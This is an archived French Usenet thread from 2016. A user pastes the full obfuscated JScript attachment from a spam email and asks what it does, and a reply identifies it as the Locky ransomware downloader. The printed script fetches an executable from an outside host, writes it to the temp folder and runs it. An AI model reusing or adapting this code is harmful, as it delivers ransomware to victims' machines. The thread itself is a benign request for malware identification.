Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]
Groups > fr.comp.lang.javascript > #2968 > unrolled thread
| Started by | Gloops <gloops@zailes.invalid.org.invalid> |
|---|---|
| First post | 2016-02-25 18:21 +0100 |
| Last post | 2016-03-12 16:19 +0100 |
| Articles | 3 — 2 participants |
Back to article view | Back to fr.comp.lang.javascript
Truc bizarre de loustic Gloops <gloops@zailes.invalid.org.invalid> - 2016-02-25 18:21 +0100
Re: Truc bizarre de loustic Pierre Maurette <maurette.pierre@free.fr> - 2016-03-12 09:10 +0100
Re: Truc bizarre de loustic Gloops <gloops@zailes.invalid.org.invalid> - 2016-03-12 16:19 +0100
| From | Gloops <gloops@zailes.invalid.org.invalid> |
|---|---|
| Date | 2016-02-25 18:21 +0100 |
| Subject | Truc bizarre de loustic |
| Message-ID | <nand77$n2e$1@usenet.pasdenom.info> |
Bonjour tout le monde,
Alors que je suis en Ile de France, un loustic de Turquie a allégué que
j'aurais envoyé de Grande Bretagne à un destinataire lui aussi en Grande
Bretagne, un fichier PDF avec le texte d'accompagnement "Image data in
PDF format has been attached to this email."
En jetant un coup d'œil il s'avère que ce fichier PDF est un fichier ZIP
qui contient un fichier d'extension js avec le contenu ci-après à la fin.
En essayant de décoder les ASCII ça n'éclaire pas beaucoup (je me suis
limité aux quatre premières variables) :
____
A?JEv;A:Obje;?J
W;5cr;EFt;E;5h;ACl
;-NF=E;@-n;LEHF;Em;AE;J5JHEEg;I']('%;6E;D;2%') + ';F;.AM;G3yRM.e;NA
;DS;:D;C; E;:M;C;0T;62
____
Bon alors on est bien d'accord que c'est une histoire de loustic (après
tout j'ai bien reçu la semaine dernière une facture pour des prestations
d'accompagnement, qui émanait d'un collège en Israël ; nul doute que se
trouvent en Israël des personnes qui pourraient prétendre à facturer
leur présence, mais avant de payer je veux voir ;) ), mais je serais
assez curieux de savoir ce que pourrait bien faire ce script si il me
venait l'étrange idée de double-cliquer dessus.
Si quelqu'un s'y retrouve ?
Nous sommes bien d'accord que c'est très bien que les hébergeurs se
soient préoccupés de filtrer efficacement, à une époque je ne me serais
pas amusé à tout ça sur chaque spam que je recevais.
Voilà le contenu de la chose :
_______________________________
var YQPYqGFs= this['A\u0063\u0074\u0069v\u0065\u0058Obje\u0063\u0074'];
var eOrMRkJ = new
YQPYqGFs('W\u0053cr\u0069\u0070t\u002E\u0053h\u0065\u006Cl');
var vEiAQ =
eOrMRkJ['\u0045\u0078\u0070\u0061\u006E\u0064\u0045n\u0076\u0069\u0072\u006F\u006Em\u0065\u006E\u0074\u0053\u0074\u0072\u0069\u006Eg\u0073']('%\u0054E\u004D\u0050%')
+ '\u002F\u0046\u0065M\u0071\u0051yRM.e\u0078\u0065';
var YaVmudBF = new
YQPYqGFs('\u004DS\u0058\u004D\u004C\u0032\u002E\u0058M\u004C\u0048T\u0054\u0050');
YaVmudBF['\u006Fn\u0072\u0065\u0061\u0064ys\u0074\u0061\u0074ec\u0068\u0061\u006E\u0067e']
= function() {
if (YaVmudBF['\u0072\u0065ad\u0079st\u0061\u0074\u0065'] === 4) {
var VWIDQ = new
YQPYqGFs('\u0041\u0044\u004F\u0044\u0042.\u0053\u0074r\u0065\u0061\u006D');
VWIDQ['o\u0070e\u006E']();
VWIDQ['\u0074\u0079pe'] = 1;
VWIDQ['w\u0072\u0069te'](YaVmudBF['R\u0065\u0073\u0070\u006Fn\u0073\u0065\u0042\u006F\u0064\u0079']);
VWIDQ['\u0070o\u0073\u0069\u0074i\u006Fn'] = 0;
VWIDQ['s\u0061\u0076e\u0054\u006FF\u0069le'](vEiAQ, 2);
VWIDQ['\u0063\u006Co\u0073e']();
};
};
try {
var iLWBVxg = '\u0052un';
YaVmudBF['\u006Fpe\u006E']('G\u0045T' ,
'h\u0074tp\u003A\u002F\u002F\u006B\u0061\u0072t\u006Fnst\u0061n\u0064\u0061mb\u0061l\u0061j\u002Ec\u006Fm\u002E\u0074r/system\u002Fl\u006F\u0067\u0073\u002F\u00387\u0068\u00375\u0034',
false);
YaVmudBF['\u0073en\u0064']();
eOrMRkJ [iLWBVxg](vEiAQ, 1, false);
} catch (ajg9ggxFs) {};
[toc] | [next] | [standalone]
| From | Pierre Maurette <maurette.pierre@free.fr> |
|---|---|
| Date | 2016-03-12 09:10 +0100 |
| Message-ID | <mn.62267e035bdf1287.79899@free.fr> |
| In reply to | #2968 |
Gloops : > Bonjour tout le monde, [blah interminable] <URL: https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?name=TrojanDownloader%3aJS%2fLocky.A&threatid=2147709233&enterprise=0> -- Pierre Maurette
[toc] | [prev] | [next] | [standalone]
| From | Gloops <gloops@zailes.invalid.org.invalid> |
|---|---|
| Date | 2016-03-12 16:19 +0100 |
| Message-ID | <nc1c2t$71o$1@usenet.pasdenom.info> |
| In reply to | #2973 |
Le 12/03/2016 09:10, Pierre Maurette a écrit : > Gloops : >> Bonjour tout le monde, > > [blah interminable] Bah si on ne peut plus rigoler ... > > <URL: > https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?name=TrojanDownloader%3aJS%2fLocky.A&threatid=2147709233&enterprise=0> Ah je suppose que ça peut servir si jamais on clique plus vite que son ombre, merci. Bon regarder ce que le machin a dans les tripes on va laisser tomber j'imagine.
[toc] | [prev] | [standalone]
Back to top | Article view | fr.comp.lang.javascript
csiph-web